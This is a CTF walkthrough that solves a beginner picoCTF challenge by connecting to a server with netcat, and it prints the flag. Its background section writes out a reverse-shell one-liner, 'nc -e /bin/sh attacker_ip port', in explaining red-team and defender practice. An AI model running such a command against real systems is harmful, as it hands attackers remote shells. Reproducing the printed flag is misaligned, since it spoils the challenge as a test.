Description
Connect to the server and get the flag.
Setup
Use netcat to connect to the provided host and port.
nc saturn.picoctf.net <PORT>Solution
Want to try it yourself first?
The guided walkthrough reveals hints one step at a time.
Step 1
Connect with netcatObservationI noticed the challenge description said to connect to a server and provided a host and port, which indicated this was a raw TCP service and suggested using netcat, the standard tool for opening bare TCP connections without an application-layer protocol.Run the nc command with the host and port from the challenge page. The server immediately sends the flag without requiring any input.bashnc saturn.picoctf.net <PORT>Expected output
picoCTF{s4n1ty_c4t}What didn't work first
Tried: Trying to connect with curl instead of nc, e.g. curl saturn.picoctf.net:<PORT>
curl speaks HTTP and immediately sends a GET request with protocol headers. The challenge server is a raw TCP service that does not speak HTTP, so curl either closes the connection immediately or hangs waiting for a valid HTTP response that never comes. nc makes no assumptions about the application protocol and simply forwards the raw byte stream, which is what the server expects.
Tried: Omitting the port number and running nc saturn.picoctf.net without specifying <PORT>
nc requires both a host and a port number to open a connection. Without the port it either prints a usage error or attempts to connect to port 0, which is reserved and will be refused. The correct command always includes the specific port shown on the challenge instance page.
Learn more
netcat (
nc) is a command-line tool that establishes raw TCP or UDP connections. The basic syntaxnc <host> <port>opens a connection to the specified host on the specified port, then passes data between your terminal's stdin/stdout and the network socket. It is the simplest way to interact with a service that speaks plain text.In CTF challenges,
ncis used to connect to challenge servers that serve flags, run programs, or host interactive puzzles. The host is typically a domain name or IP address, and the port identifies which service on that host to connect to - similar to how a building address (host) and apartment number (port) together identify a specific destination.Common netcat use cases beyond CTFs include:
- Testing whether a port is open:
nc -zv host port - Listening for incoming connections:
nc -l -p port - Transferring files between machines over a network
- Debugging HTTP or SMTP servers by hand-crafting requests
On some systems, netcat is installed as
ncat(the Nmap version) ornetcat. The flags differ slightly between implementations, but the basic connection syntax is the same.Under the hood,
ncperforms a standard TCP three-way handshake with the target host: it sends a SYN packet, waits for a SYN-ACK from the server, then completes the connection with an ACK. Once the connection is established, data flows as a raw byte stream - netcat makes no assumptions about the application-layer protocol. This is why it works equally well against HTTP servers, custom CTF services, or anything else that speaks TCP.In penetration testing, netcat is sometimes called the "TCP/IP Swiss Army knife" because of its versatility. Red teamers use it to set up reverse shells: a compromised machine runs
nc -e /bin/sh attacker_ip portto send a shell back to the attacker's listener. Defenders detect this activity by monitoring for unexpected outbound connections or unusual use of thencbinary. Many modern Linux distributions ship without the-eflag specifically to limit this abuse vector.When a challenge server does not respond immediately after connecting, it is usually waiting for input. Common opening moves include pressing Enter, typing
help, or sending a specific protocol keyword likeGET / HTTP/1.0. Reading the challenge description carefully for hints about the expected protocol is always worthwhile before sending blind guesses.For challenges that require scripted interaction - sending inputs based on the server's responses - raw netcat quickly becomes insufficient. The
pwntoolsPython library providesremote(host, port)to connect and methods likerecvline(),sendline(), andinteractive()to automate multi-step conversations with a server. Graduating from manual netcat to scripted pwntools is one of the key progressions in CTF skill development.- Testing whether a port is open:
Flag
Reveal flag
picoCTF{s4n1ty_c4t}
netcat is the go-to tool for connecting to challenge servers that speak plain text - it opens a raw TCP connection and passes data between the terminal and the server.